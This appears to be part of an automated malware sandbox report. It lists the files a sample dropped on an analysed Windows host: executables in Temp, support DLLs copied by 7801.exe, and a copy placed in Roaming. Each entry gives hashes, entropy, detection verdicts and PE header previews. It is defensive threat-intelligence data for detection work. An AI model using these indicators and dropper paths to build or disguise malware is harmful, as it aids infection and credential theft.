SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8EC4.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\8EC4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	700
Entropy (8bit):	5.346524082657112
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5:	65CF801545098D915A06D8318D296A01
SHA1:	456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256:	32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512:	4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Temp\7801.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	905216
Entropy (8bit):	7.399713113456654
Encrypted:	false
SSDEEP:	12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5:	852D86F5BC34BF4AF7FA89C60569DF13
SHA1:	C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256:	2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512:	B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P\|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7CA1.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327680
Entropy (8bit):	5.555665914483739
Encrypted:	false
SSDEEP:	3072:QOWFvVSz4X34ToHWGPOeh20XTF2xi69YPUy0ZPv4J3vfrhVggjcGkNIVqI:QO0sMITBsh20XTIp6M5Pv4tX7ITsq
MD5:	3754DB9964B0177B6E905999B6F18FD7
SHA1:	F47B3FCF01C76AF3B174792519D44171413D25AE
SHA-256:	F56B4C870E0B40ED1BF4F1019346F14443BBE8608D6F75ACB92B176D138F74B7
SHA-512:	8BF6439AD6FDC8A8F48F4520FB33A4D69E014BFB70EE3E691DBC611ACA11F1FE2C4B0D3901176455E6D46B8AA661B21C93069E0ABAF78DC93284935E866B29FA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j\|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....,._................. ...\......`3.......0....@.................................w...........................................(....................................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data................~..............@....rsrc................"..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\86C4.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	313344
Entropy (8bit):	5.391612297954252
Encrypted:	false
SSDEEP:	3072:3UXmSAohOX34vYHW6gl/rdGolEt1KBCLZISE8LqVpqVggjcGkNIVqI:3UWkWIvxNNkwEt1z9LoS7ITsq
MD5:	B11C5DEFDBA76C2B3EE67EE1B474389D
SHA1:	CCFA42FFB4378AFD337C14514B3EEA9BCF3FC03D
SHA-256:	6380B2CE70ACCB02DE54067A3CDFF27D87E2FAD23F36870C8F90E825E0AE8F2B
SHA-512:	D6683BC03CBF250D17D7BCE5AF562C9D94007669C2321037E644447FE5885B18461BEEAE4B8E848DEBB8DC70B1921A229CDE550ED566D0E13581DCEF2A6B65FB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j\|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8EC4.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	537088
Entropy (8bit):	5.840438491186833
Encrypted:	false
SSDEEP:	12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
MD5:	D7DF01D8158BFADDC8BA48390E52F355
SHA1:	7B885368AA9459CE6E88D70F48C2225352FAB6EF
SHA-256:	4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
SHA-512:	63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y...............0.............I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ..................... ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(......0..,.......(d...8.....~....u....s....z&8.........8...................................(d...(.......j................................(.....~(....(^...8....(.........8........................................0..............0...................................(......0.....................0..............(....z.A.........z.A............................................*.......

C:\Users\user\AppData\Local\Temp\8ED5.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	373760
Entropy (8bit):	6.990411328206368
Encrypted:	false
SSDEEP:	6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
MD5:	8B239554FE346656C8EEF9484CE8092F
SHA1:	D6A96BE7A61328D7C25D7585807213DD24E0694C
SHA-256:	F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
SHA-512:	CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......\|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9A02.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356864
Entropy (8bit):	7.848593493266229
Encrypted:	false
SSDEEP:	6144:v5aWbksiNTBiNg5/dEQECtD2YajndnU4aomwStqUJE0ra7yswH:v5atNTMNg5eQX2BdUcDStq+J4bwH
MD5:	6E7430832C1C24C2BF8BE746F2FE583C
SHA1:	158936951114B6A76D665935AD34F6581556FCDF
SHA-256:	972D533E4DF0786799C0E7C914AA6C04870753C10757C5D58CD874B92A7F4739
SHA-512:	79289323C1104F7483FAC9BF2BCAB5B3804C8F2315C8EDEA9D7C83C8B68B64473122F9B38627169D64A35A960A5F74A3364159CA9CB37B0A2B1BA1B41607A8C8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ACEF.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3570176
Entropy (8bit):	7.997630766149595
Encrypted:	true
SSDEEP:	98304:Eyu1PF0IdV1/b4gfya9kofb/4rosp08oUPQH:EjtFp/tfyOTQrosGrUP0
MD5:	DDC599DB99362A7D8642FC19ABE03871
SHA1:	11199134356D8DE145D2EE22AAC37CA8AABA8A0B
SHA-256:	5D94F66FD3315E847213E16E19DFEB008B020798CFFF1334D48AC3344B711F22
SHA-512:	E35DBE56828E804AA78FE436E1717C3A09C416DBE2873FFFC9B44393E7EC2336CE9C544E4D6011C58E7E706819AEABC027AF9A85AA2A2509BDFC39699560ABFD
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.a.................$...................@....@.......................... T.....b.6.....................................\|lO. .....M...................................................................................................................... ..........................@................0......................@...........&....@......................@................0......................@............1...P......................@............02......./.................@....rsrc.........M......40.............@....T3QbYgM.....`O.......1.............@....adata........T......z6.............@...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B58B.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	905216
Entropy (8bit):	7.399713113456654
Encrypted:	false
SSDEEP:	12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5:	852D86F5BC34BF4AF7FA89C60569DF13
SHA1:	C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256:	2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512:	B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P\|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BEB3.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	557664
Entropy (8bit):	7.687250283474463
Encrypted:	false
SSDEEP:	12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
MD5:	6ADB5470086099B9169109333FADAB86
SHA1:	87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
SHA-256:	B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
SHA-512:	D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
Malicious:	false
Reputation:	unknown
Preview:	MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..

C:\Users\user\AppData\Local\Temp\CC60.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	354816
Entropy (8bit):	7.859676161369944
Encrypted:	false
SSDEEP:	6144:ezBkLL2NTBY2j1gmB0cR8zGnIu4TBJCb2WefmJwJS6jbMXC3DvMk7y:eKyNTa25ccRPIu49JmYt3jbM/
MD5:	DF7952A5FC82DFB2E49AE81B6A1BE135
SHA1:	4F3A8CD939FBE37426EFDA7C88FBD2E49D8F8986
SHA-256:	F04B77C60C896B33ED8FE286DE3341FC3FFD0211A987435475DC7E9D0ABCB0CC
SHA-512:	96A495E5D30E66A236C0AEA19DAEDF95B31F254E457647B6553F2D6CAE117F0A6DA2468550333FBAE3FFA94D0960E2459D2259D3B4C2598EFE49FC03E6C36F1A
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^............... ....@.........................................................................ta..........4...........................................................................hd..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3... ...4..................@..@.data...$....`.......@..............@....rsrc...4............R..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D984.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	301056
Entropy (8bit):	5.192330972647351
Encrypted:	false
SSDEEP:	3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
MD5:	277680BD3182EB0940BC356FF4712BEF
SHA1:	5995AE9D0247036CC6D3EA741E7504C913F1FB76
SHA-256:	F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
SHA-512:	0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E666.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294400
Entropy (8bit):	5.164848187454738
Encrypted:	false
SSDEEP:	3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
MD5:	8362E0F91AE3379C73422BBCA7BAC493
SHA1:	EC761F77BBE9900AED7FFA0A9303DC6801A9EFFB
SHA-256:	ADFEA20237BE615461C44FEA423D6043FC74BF1C5303EE33FCECD8ACD201291E
SHA-512:	A509F836E79276E35EE721AEB596214550E410753A122CE254CB3943EDA371713A9FE597717471BC13D884B497D767C393715C4224777F725C4F3EBED9286CAB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j\|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L......`................. ..........`3.......0....@.............................................................................(.... ...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........"...~..............@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lagavljy.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\86C4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10543104
Entropy (8bit):	6.35786276890293
Encrypted:	false
SSDEEP:	49152:xLORQkvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvP:xLORQ
MD5:	7A36C0AD3083A1519CCE3A67BB377D18
SHA1:	60416774DCA16DAC538703FC0DBF17E9D5F284DA
SHA-256:	B968714F907A742E784710A566FC7178C278C074CAA95C5405D40573F35DBEBC
SHA-512:	D9ACD8081190D480227E1B61FD3C8D7AA85B687AE53AFC90E412CCA158368AC2FEDFE50F62BE25C893F90ED65AE4E22EAFEBBEE352A94680BC8EAC6548170776
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j\|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\uufaeea Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294400
Entropy (8bit):	5.164848187454738
Encrypted:	false
SSDEEP:	3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
MD5:	8362E0F91AE3379C73422BBCA7BAC493
SHA1:	EC761F77BBE9900AED7FFA0A9303DC6801A9EFFB
SHA-256:	ADFEA20237BE615461C44FEA423D6043FC74BF1C5303EE33FCECD8ACD201291E
SHA-512:	A509F836E79276E35EE721AEB596214550E410753A122CE254CB3943EDA371713A9FE597717471BC13D884B497D767C393715C4224777F725C4F3EBED9286CAB
Malicious:	true
Reputation:	unknown
